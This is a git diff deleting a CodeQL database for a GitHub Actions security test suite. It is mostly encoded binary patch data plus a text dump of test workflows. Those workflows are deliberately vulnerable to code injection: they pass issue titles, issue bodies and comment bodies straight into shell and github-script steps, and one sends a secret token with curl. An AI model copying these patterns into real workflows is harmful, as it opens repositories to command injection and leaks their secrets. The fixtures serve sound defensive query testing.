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 Z=7sl)vp4hg{VQtt3C`Sba!D)v{{YT;I}ZQ= diff --git a/db/db-yaml/default/locations_default.rel.checksum b/db/db-yaml/default/locations_default.rel.checksum deleted file mode 100644 index 03a4aef720e484065375574c17a9a760156d9e3a..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 12 RcmZQzU|?hbf+ISNGXVrd0gM0u diff --git a/db/db-yaml/default/pools/0/buckets/info b/db/db-yaml/default/pools/0/buckets/info deleted file mode 100644 index cd70331e4c890dbea42420922676a5295c6ac512..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 40 dcmZQz00Tw{#Q>$*|AY9`S3Yh7(c(-BQUES?1O)&9 
diff --git a/db/db-yaml/default/pools/0/buckets/page-000000 b/db/db-yaml/default/pools/0/buckets/page-000000 deleted file mode 100644 index 8cbf6df672d50f404488bb5fc1472b6e689524e5..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 8192 zcmcJN1CVCR5`<@M+qP}nwr$(qyS8!H-fP>oZQIuSdM10fw(t38_Qi|W5%p(QW>$5d ziMc0PT->R+=+iKHw4Ri@BgR~R?y_gC>FZg;@F^za<;Egez`oQg)GTQZ(gZUv2EC6q zf_yITT`vk}f_ubYQ0992VSHQ0U|&)5y~j1Tha_ zyt3wgOj7w?!xOA;rm=KNKM|{ zlFST~J7oA^9~Pb>pN^_&GA|kKV$GEe|9_o+`86~-HcJ{GJa|3i3fY7%dF zUD_mie#s1oMjP(4cZ+0nS?VR~I6DV|87OxSYVM@&+CbkT;@+}> zR+!v7nw=VWZf{j;8h(uk&-qd3WyHD4k27;4&_B{$_0V_HXIKA^7FAOJqfl}rbTsPL zAb*s;a-jKm3r_<4MEyg7?%Hh9lJV|w!QKPr8}E~MweorCyHLNW?adwt}PCkAKo=JtuqwAJ5c2{XS( z1*bHkg?BbKIpb|?{EG!ZW= zUQVhy)siYexwC`X!X3q_54rnI`e*fqeEPdA61w~y?&tq>?&jWag72?t?*4DD9l$^V z<|~3tw0Ago5UrE;jusXp^I&kdzwb4XPXoWCW*bTGPd|_vDcy~gFx>T})n_ofDx)`a zCg+g^i2vPa_)L@c@&}N)5qh2APM1Ftp|v#H>wc+lj4-qCJ#)|RK{l!_hqztFizblV z+-c-X=xe&GN)p-J^4>$tO5UA%!h|m2_gUK*o)7*N`Jxds zCKgZMRc4Efr-HyA>YJJG2qG8SMHkrrMtViu^;YmL#npE=`Zmp#*Yyj*4b(T(YUNgt zdD6_RG+bksKuWq3Qm!YvL3bP$<`o_!a|^XD#=a`(X_R&AesVv->56|YV*Z%sN-4j@ z>~T^i_2YwmFVKI&zP|$fYP1KaSE$*>D{XjEv;IY~%QVyE``@V!Cr^`Bzs&VMrz&(GH|nQ=~}@4&lP`T*F`WSl&QnoK=M zEtdDI$t=}(cQP8$3nzv7yHt(H)FL^OI!xunuWd5D49AWY zhunJR+EC9>ov9Ck4AQ^OIir*zzl>T)y+N&K=hhhayRlh#wG;9E>OGf{@!2SB$6MA= z?hF;CfftEaF8-{S=ahNytrxAh&*4wW|IA^GH+99j1OG4TPI#9fR~)TwpdnpyrUiai z-FrzWqWPBGUZXG6p4-rKpg#eAWqe0(((XoN*O+@JN%!$ekfv&~81H>}X4Cupcy^7T z&LYeK4^i&qh{z^5|NhOR>|)LKA(C3$rEfL6RvP`^n=UHfi*8}IC$%q;xjkn8Y;s+g z9U76JZF2sm1>|a(Y-aJ*;2A>6B4*rdb@Zj+3TkhR3|9Qvl!Whd7Ed#CAeh@}-kDZj z^B`k)c>eZfWJZ!1!2TXVw!M}tm%iUGy$t-5%tOIGH`X*li(2=ca`|OG9?Z?)y?LlI z=I`R7WulfvXv-tCQ0f-k>HWq=zuEBB1j_o5u&3!un5>cGQlf9?J9-A+Vl$3+!(XKx z!;INXe5^dzHceue%k(BQhRSB<+L^f@&~G4D(}geNx75s~hZj&^ z3QURrM#Qr8=A99CTouF-%x5Gw-vrVIbEEKflWS`-j(#2VzD-Vct#%wkJVhU#T;`5# zfjQ0e&6q7`vd#e^A8wx7l1FUAerww;>F#h?7-3_Eo zkMR78?vOmb0UtNq(}JEv;90Z#o(O-w@vVJ@(ci)-&);B>v>x;)#0!C?_4nB%Ej4{1 
zX@2Juo+N_fnOUH@H71uAJ}lU0?6_a#rINTAoXA^lFf)&#_0#+8tm6#=VIKWaX}5zP N8$Z8x_A{EJ{{h2qJBR=P diff --git a/db/db-yaml/default/pools/0/info b/db/db-yaml/default/pools/0/info deleted file mode 100644 index 973b70fb15116e4f998ef8f5b6a62593c9526151..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 33 ZcmZQz00U-51_q`z5H!_m_hto?vCp~^jBYpLjWBQ1Y!UH 
diff --git a/db/db-yaml/default/pools/0/metadata/page-000000 b/db/db-yaml/default/pools/0/metadata/page-000000 deleted file mode 100644 index 60d89d0166f9fc32e6b58c35f33c5268e1a4119d..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 16384 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 diff --git a/db/db-yaml/default/pools/0/pageDump/page-000000000 b/db/db-yaml/default/pools/0/pageDump/page-000000000 deleted file mode 100644 index e8abb81542c..00000000000 --- a/db/db-yaml/default/pools/0/pageDump/page-000000000 +++ /dev/null 
@@ -1,55 +0,0 @@ -/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/argus_case_study.yml/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/Users/pwntester/src/github.com/githubsecuritylab/Users/pwntester/src/github.com/Users/pwntester/src/Users/pwntester/Users/nametag:yaml.org,2002:strIssue Workflowontag:yaml.org,2002:boolissuestypesopenededitedtag:yaml.org,2002:seq[opened, edited]tag:yaml.org,2002:maptypes: ... edited]issues:jobsredirectIssueruns-onubuntu-latestCheck for issue transferCheck f ... ransferenvcontent_analysis_responsecontent ... esponseundefinedcontent ... definedstepsusesactions/checkout@v2uses: a ... kout@v2Remove conflicting charsRemove ... g charsISSUE_TITLE${{github.event.issue.title}}${{gith ... title}}ISSUE_T ... title}}frabert/replace-string-action@1.2frabert ... ion@1.2idremove_quotationswithpattern""\""string${{env.ISSUE_TITLE}}replace-with-"-"pattern: "\""name: R ... g charsCheck infocheck-inforunecho "foo $(pwsh bar ${{steps.remove_quotations.outputs.replaced}}) " >> $GITHUB_ENV -|name: Check info- uses: ... kout@v2runs-on ... 
-latestredirectIssue:name: Issue Workflow/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/changed-files.ymlCIpull_requestbranchesmain- mainbranches:pull_request:changed_filesTest changed-filesactions/checkout@v4fetch-depth0tag:yaml.org,2002:intfetch-depth: 0uses: a ... kout@v4Get changed fileschanged-filestj-actions/changed-files@v40tj-acti ... les@v40name: G ... d filesList all changed filesList al ... d filesfor file in ${{ steps.changed-files.outputs.all_changed_files }}; do - echo "$file was changed" -done -name: L ... d files- uses: ... kout@v4changed_files:name: CI/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/comment_issue.ymlissue_commentecho-chamberecho '${{ github.event.comment.body }}' -run: |- run: |echo-chamber2echo '${{ github.event.comment.body }}'echo '$ ... ody }}'run: ec ... ody }}'echo '${{ github.event.issue.body }}'echo '${{ github.event.issue.title }}'echo '$ ... tle }}'run: ec ... tle }}'- run: ... ody }}'echo-chamber3actions/github-script@v3actions ... ript@v3scriptconsole.log('${{ github.event.comment.body }}')console ... dy }}')script: ... dy }}')uses: a ... ript@v3console.log('${{ github.event.issue.body }}')console.log('${{ github.event.issue.title }}')console ... le }}')script: ... le }}')- uses: ... ript@v3echo-chamber:on: issue_comment/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/comment_issue_newline.yml/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/cross1.yml[opened,edited]permissions{}ISSUE_BODY${{github.event.issue.body}}${{gith ... .body}}outputsresult${{env.content_analysis_response}}${{env. ... ponse}}result: ... ponse}}Check Issue Titleactions-ecosystem/action-regex-match@v2actions ... 
atch@v2regex-matchtextregex^[A-Za-z0-9 _.]*$'^[A-Za-z0-9 _.]*$'flagsgtext: $ ... title}}name: C ... e TitleExit Jobif${{ steps.regex-match.outputs.match == '' }}${{ ste ... = '' }}echo "Bad Issue Title Format" -exit 1 -name: Exit Jobfrabert/replace-string-action@v2.5frabert ... on@v2.5'-'Check InformationISSUE_TITLE_PARSED${{steps.remove_quotations.outputs.replaced}}${{step ... laced}}ISSUE_T ... laced}}echo "content_analysis_response=$(pwsh .\\.github\\scripts\\title_analyzer.ps1)" >> $GITHUB_ENV -name: C ... rmationLabel issueenv.content_analysis_response != 'Valid'env.con ... 'Valid'curl -v -u admin:${{ secrets.DYNAMOBOTTOKEN }} -d '{"labels": ["${{env.content_analysis_response}}"]}' ${{ github.event.issue.url }}/labels -name: Label issuename: C ... ransfercheckIssueInformationcheckIs ... rmationneeds.redirectIssue.outputs.result == 'Valid'needs.r ... 'Valid'Check for missing informationCheck f ... rmationneedsanalysis_responsegreetings_commentThank you for submitting the issue to us. We are sorry to see you get stuck with your workflow. While waiting for our team member to respond, please feel free to browse our forum at https://forum.dynamobim.com/ for more Dynamo related information."Thank ... orry tocomment_introHello ${{ github.actor }}, thank you for submitting this issue! We are super excited that you 